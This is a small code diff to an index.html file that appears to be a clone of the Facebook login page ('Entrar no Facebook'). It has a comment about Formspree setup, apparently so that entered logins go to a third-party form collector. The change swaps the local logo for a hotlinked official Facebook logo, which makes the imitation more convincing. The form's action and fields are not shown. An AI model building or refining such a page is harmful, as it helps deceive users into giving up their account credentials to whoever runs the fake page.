--- a/index.html
+++ b/index.html
@@ -105,7 +105,7 @@
 <body>
   <div class="login-container">
     <div class="login-box">
-      <img src="facebook-logo.png" alt="Facebook Logo">
+      <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/89/Facebook_Logo_%282019%29.svg/2560px-Facebook_Logo_%282019%29.svg.png" alt="Facebook Logo">
       <h2>Entrar no Facebook</h2>
       <!-- Configuração do Formspree -->
       <form id="login-form">
